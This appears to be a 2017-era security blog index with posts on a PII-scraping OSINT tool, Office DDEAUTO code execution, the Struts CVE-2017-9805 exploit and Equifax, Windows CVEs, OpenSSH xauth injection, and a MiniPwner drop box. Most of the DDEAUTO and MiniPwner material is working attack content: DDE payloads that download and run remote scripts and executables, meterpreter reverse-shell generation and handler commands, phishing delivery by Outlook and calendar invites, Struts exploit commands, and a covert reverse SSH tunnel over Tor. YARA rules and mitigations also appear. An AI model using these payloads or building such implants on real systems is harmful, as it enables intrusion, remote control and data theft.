skiptracer

My new open source python OSINT framework, skiptracer was released @ HushCon East on June 1st. Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Using some basic python webscraping of PII paywall sites to compile passive information on a target. The modules will allow queries for phone/email/screen names/real names/addresses/IP/Hostname/breach credentials etc.. It will help you collect relevant information about a target to help expand your attack surface.`Everyone should be encourage to submit new ideas/modules. You can get the code here: https://github.com/xillwillx/skiptracer feel free to submit new modules or code fixes.

Office DDEAUTO attacks

Sensepost posted 10 days ago about a vulnerability which can trigger command execution, without use of macros, when someone opens a specially crafted Office document. Although a little bit of social-engineering needs to come in play for the victim to click ‘yes’ to the first 2 of 3 message boxes, most end-users are easily tricked. They found that by abusing the parameters of the DDEAUTO function that they could use powershell to download malicious payloads remotely. DDE is a legacy Inter-Process Communication (IPC) mechanism dating back to 1987, which establishes a dynamic data exchange (DDE) link with a document created in another Microsoft Windows-based program, (new information becomes available in a linked document, a DDE field inserts new information when you update the field). SensePost discovered that instead of specifying an application like Excel, an attacker can specify arbitrary parameters of another application as the first parameter, and quoted arguments as the second parameter (which cannot exceed 255 bytes).

Although Sensepost just demonstrated this using Word, they left other ideas up to the reader. There has been other ways being thrown around on Twitter over the past week, on a bunch of ways to accomplish code execution in Word, Excel, and even Rich-Text based Outlook emails. I’ll go over some of the items I have been able to test successfully in my lab.

The quick and easy test:
Open new word document, press CTRL+F9 key, and paste this between the {} brackets then save the file
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

You should have something similar that looks like the image above.

Payloads:
Although popping calc is cute and all for demo purposes, you can do more mischievous things to execute malicious payloads on a target system.

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\\Windows\System32\cmd.exe /c cscript.exe index.js"

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll "

DDEAUTO c:\\windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe"

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e "

I’ve also created a bash script that uses CactusTorch to automatically generate reverse TCP/HTTP/HTTPS meterpreter payloads in vbs/hta/js that you can insert into Word documents for testing. https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

Also I’ve seen in the wild that you can you can obfuscate the messagebox contents furthering your social-engineering attempts to trick the user into clicking yes.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

Although powershell webdl scripts are easier to do you might want to have your payload all in one document so its not calling out for your binary over the network. Dave Kennedy updated his Unicorn python script to generate a msfvenom meterpreter payload that gets base64 encode/decoded when the DDEAUTO is triggered. Dave recently updated some fixes I sent to him along with the way obfuscate the messageboxes.
Open a console in Kali

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
git clone https://github.com/trustedsec/unicorn.git && cd unicorn
python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
cat powershell_attack.txt  | xclip -selection clipboard | leafpad powershell_attack.txt 

Paste your cat'd payload into Word and save it, then to send to your target. Then in a new console window open your metereter handler to recieve some shells.

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"

* if you need your external IP change the first line of code to:
IP="$(dig +short myip.opendns.com @resolver1.opendns.com)"

Outlook:
You can also trigger this with an Outlook Rich Text email message, the only caveat on Outlook 2013/2016 being that you need to embed an image/chart/object into it first before adding the DDEAUTO payload.
Open new word document, press CTRL+F9 key, and paste your payload between the {} brackets, then open a new Outlook email message. Go to the Format Text tab and change the message to Rich Text formatting.

In the body of the message copy and paste any image into the body.

From your Word Document copy your DDEAuto payload, then paste that into the body of the email. Enter the recipient etc and send. You'll get the DDE messages, just say no to them. When your recipient receives the email, it wont trigger until they press reply. If they press yes to the first 2 messageboxes then it'll execute your payload.

Calendar Invites:
Another attacker vector would be recurring Calendar invites. Every time the target opens it they get re-owned.

Mitigations:
This has been tested to work on doc(x/m), dot(x/m), rtf, Word xml, draft msg & oft files. Although the underlying parsing using Word triggers this behavior when these file types are opened. Microsoft responded that it is a feature and no further action will be taken to fix (unless of course the current ransomware attacks and other viruses force their hand).
wdormann made a quick .reg gist hack that will help disable DDEAUTO in the registry, although it does break some things in OneNote.

Nviso made some YARA rules to detect DDE also

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
  
rule Office_DDEAUTO_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
  condition:
    $a
}
  
rule Office_DDE_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee]\b.+?/
  condition:
    $a
}
 
rule Office_OLE_DDEAUTO {
  strings:
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
 
rule Office_OLE_DDE {
  strings:
    $a = /\x13\s*DDE\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a

Equihax


In July, CVE-2017-9805, was reserved for the Apache Struts RCE vulnerability in the REST plugin. Apache Struts 2.5 through 2.5.12 that are using REST plugin are vulnerable to this attack. It had an initial disclosure on 7/17/2017, and a patch was released recently on 9/5/2017, with Apache updating Struts to version 2.5.13 was released. The flaw exists in using the Struts REST plugin with XStream handler to handle XML payloads. If exploited correctly, it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it. The problem occurs in XStreamHandler’s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object. lgtm has in in depth article along with a press release from Apache Foundation. The company Lgtm, who discovered the CVE-2017-9805 vulnerability, had warned that at least 65 percent of Fortune 100 companies use Struts, and they could all be exposed to remote attacks due to this vulnerability.

Equifax, one of the “big-three” U.S. credit bureaus was most likely, and unfortunately, not watching the bleeding-edge of security to prevent their server from being compromised. When they discovered the “unauthorized access” on July 29, they called in the security team from Mandiant to help them figure out the fallout of having potentially 143 million people’s PII released to the hackers. They released a video on September 7th, urging people to sign up on equifaxsecurity2017.com, which it itself was a shitshow, along with it being a poorly coded site, it was also flagged as a phishing site and didn’t even seem to be looking up the data correctly, with people using false info and still getting the same response from the site as a real account would. I’d be weary to submit my information to that site, along with some reports that the wording in the site gives them a loophole on you not being able to be part of a class action lawsuit if that ever comes to fruition.
. Below is a video from the CEO of Equifax about the incident.


Rick Smith, Chairman and CEO of Equifax Inc., on cybersecurity incident involving consumer information. Equifax has established a dedicated website, www.equifaxsecurity2017.com, to help consumers determine if their information has been potentially impacted and to sign up for credit file monitoring and identity theft protection.


There’s been speculation that this Struts vulnerability is how Equifax were owned. Looking into how the exploit can be recreated shows how easy it is for an attacker to take control of a server. The team from Metasploit created a module to trigger the CVE-2017-9805 vulnerability that was released shortly after its disclosure.

For those who would like to try this out at home in your ‘test’ lab, you can quickly test this out against your test server on a linux box, like using the Kali distro.
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rbcp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/ run msfconsole and load the module by running
use exploit/multi/http/struts2_rest_xstreamshow options

Someone also anonymously released this gist on github the same day showing how you can simply exploit Struts.

Mazin Ahmed released some python code on his github that allows you to check for a vuln server or list of servers easily
Checking if the vulnerability exists against a single URL.python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'Exploiting a single URL.python struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/struts-pwn'

So make sure you patch your server if you’re running Struts, if you dont have a webserver running Struts, then all you have to do is worry about your Identity being stolen if you’re an American.
Sign up for credit monitoring if you can, and then freeze your credit files at the major credit bureaus. Information for how to file a freeze is available here.

CVE-2017-0213 – Windows COM EoP

Wrote another blog post for Milton Security about details of a vulnerability that James Forshaw of Google Project Zero found in January, that exploits a bug in Windows COM Aggregate Marshaler. An attacker can use this bug to elevate privileges on Windows machines.

Microsoft had 90 days to patch, which they have with last month’s security updates. The post includes a proof of concept code for 32 and 64 bit versions of Windows from Win7-10 and Server 2k8-2k16.
https://www.miltonsecurity.com/company/blog/cve-2017-0213-windows-com-privilege-escalation-vulnerability

CVE-2017-0199 exploiting and preventing – guest blog

Phishing scams tricking unsuspecting users into opening nefarious files are nothing new, and attackers have using weaponized documents for just about as long. This week, I had the pleasure of being featured on Milton Security’s blog to talk about a new attack that was spotted as early as last year, and was finally patched by Microsoft in April. I went over this CVE-2017-0199 vulnerability that affected Windows based machines using Microsoft Word and the default built-in Wordpad, that enabled an attacker to send a malicious RTF file that would execute a HTA file remotely without any user interaction besides opening the file. I went over how to create the file using Metasploit, a python script, and finally just using Microsoft Word itself and editing the file to make it autorun. Spear-phishing attacks could allow the attacker to send these files to their victims over a spoofed in email and gain a foothold into the victim’s network if they weren’t properly patched which the article also covered towards the end on how to mitigate. So head over there and check it out. https://www.miltonsecurity.com/company/blog/analysis-cve-2017-0199-ms-word-threats-are-back

Powershell to exe using iexpress

Saw something on twitter today about using the old standby program, iexpress.exe, which is still available in Win10, you can package your powershell scripts inside an executable. You can use it to run malicious powershell scripts etc…
SO I was thinking of some fun things to do with it, getting reverse shells, dumping passwords with mimikatz, compiling .cs files etc to evade AV and whitelisting. It’s fairly simple to do ,here’s an example of a powershell reverse shell: Continue reading

How not to roll out a website

Prophets-616x420
I’m posting this now because the hosting company has seem to finally fix the issues, I tried emailing and tweeting to them but got no response from any of the parties.

A few weeks ago there was some buzz on Rage Against the Machine’s site: Rage Against the Machine, Public Enemy & Cypress Hill member were forming a supergroup called Prophets of Rage. On the day of announcement they posted a mysterious webpage with just a countdown clock, http://prophetsofrage.com . Continue reading

OpenSSH xauth command injection

CVE-2016-3115
Affected configurations: All versions of OpenSSH prior to 7.2p2 with X11Forwarding enabled.

Vulnerability: Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1).
Injection of xauth commands grants the ability to read arbitrary files under the authenticated user’s privilege, Other xauth commands allow limited information leakage, file overwrite, port probing and generally expose xauth(1), which was not written with a hostile user in mind, as an attack surface.

Mitigation / Workaround:
disable x11-forwarding: sshd_config set X11Forwarding no
disable x11-forwarding for specific user with forced-commands: no-x11-forwarding in authorized_keys

::More Info::


CVE-2016-3116
This also affects DropBear, from their Changelog:
“Validate X11 forwarding input. Could allow bypass of authorized_keys command= restrictions”

Mitigation / Workaround:
disable x11-forwarding: re-compile without x11 support: remove #define ENABLE_X11FWD in options.h

::More Info::

MiniPwner – Evil Network Dropbox


The MiniPwner is a penetration testing “drop box”, it is a small, cheap, and simple but powerful device that can be inconspicuously plugged into a network and provide the penetration tester remote access to that network. I purchased this device for a project here @ NESIT and thought it packed quite a punch for only $23, compared to the pwnie express plugs which run upwards of $500. And at that price you could afford to lose one or two on a pentesting job and not be hurting :p

Some of the features of the minipwner include:

Atheros 400MHz MIPS CPU
32MB RAM
4MB flash
10/100Mbps Ethernet interface
802.11b/g/n wireless interface with one internal antenna
USB 2.0 port
Micro-USB power socket, approximately 1W power draw
5.7cm x 5.7cm x 1.8cm dimensions
Nmap network scanner
Tcpdump sniffer
Netcat Hacker’s swiss army knife
aircrack Wireless network analysis
kismet Wireless network analysis
perl Perl Scripting Language
openvpn VPN Client and Server
dsniff suite of sniffing and spoofing tools, including arpspoof
nbtscan NetBIOS Network Scanner
snort Sniffer, Packet Logger, Intrusion Detection System
karma Wireless Sniffing Tool
samba2-client Windows File Sharing Client
elinks Text Based Web Browser
yafc FTP Client
openssh-sftp-client Secure File Transfer Client

So after doing the initial install of open-wrt firmware and configurations for the other applications I came across an awesome article on SecurityGeneration.com which described some james bond type shit of having your pwnie express connect back to you over tor so you would essentially be untraceable. Instead of having it connect back through ssh to your IP address you would be connecting back to a tor *.onion address. But since I dont have a pwnplug the only problem that lied ahead was to convert the instructions to work on this minipwner box. Now im not an expert on getting this shit configured properly so i relied on some help from friends and general guessing to get it up and running, so your mileage may vary.

I’m not going to rehash getting minipwner onto the tp-link here, so i’ll pick up where his article left off. And im not going to rehash getting your tor hidden server running, follow step 1. on SecurityGeneration’s article if you need to figure it out.

First thing I did was get tor installed on the USB drive (which should already be setup with the original instructions on the minipwner site)

opkg -dest usb install tor-geoip

then symlink it

ln -s /mnt/usb/usr/share/tor /root/.tor

edit the tor config file

vi /etc/tor/torrc

Scroll to the bottom and change User tor to User root
next find DataDirectory /var/lib/tor and change it to /mnt/usb/usr/share/tor/lib then save the config file. This changes the logging to the USB drive, otherwise tor will start and start writing to the minipwners flash memory and soon it’ll be full. You should be able to start tor with no errors by typing tor. as long as it work you might wanna have tor start when the minipwner powers up.

add tor to default run level (startup):

cd /etc/rc.d
ln -s ../init.d/tor S99tor

Now the hardest part of the instructions was to wget connect.c and compile it. By default open-wrt doesn’t have anything to compile programs in their repository, so it’s a clusterfuck because you need to do to cross-compile connect.c for the minipwners MIPS architecture on another box using the toolchain shit , then send it over to you minipwner and pray that it works. Luckily I already went though this and have binary ::here::. I’ll write more about doing this at a later time. So, all’s you need to do is:

wget http://nesit.org/files/connect
mkdir /usr/local/
mkdir /usr/local/bin/
mv connect /usr/local/bin/connect
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Now we need to get open-ssh on the minipwner:

opkg -dest usb install openssh-client-utils

Then we need to edit the ssh config file

vi /etc/ssh/ssh_config

add these 2 line to the bottom and save the config:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Then I made a simple script to automate it to connect back to your hidden tor server
just change the blablablabla.onion to your .onion address and the ssh_user to your username

vi reversessh.sh

#!/bin/sh
Rec_Port=22
Remote_Tor=blablablabla.onion
SSH_user=anonymous
SSH_key=”/root/.ssh/id_rsa”
/mnt/usb/usr/bin/ssh -NR 3330:localhost:22 -i “$SSH_key” “$SSH_user”@”$Remote_Tor” -p “$Rec_Port”;

then save and chmod

chmod 0755 reversessh.sh

If all goes well you should be able to

./reversessh.sh

and on your tor hidden server you can just run watch “netstat -lntup” you should see:

tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous

You should be able to

ssh root@localhost -p 3330

you should be connected to your minipwner over tor 🙂

If anyone has anything to add/fix to this please hit me up illwill at illmob.org. Thnx to |m| & inhibit for help on getting this working.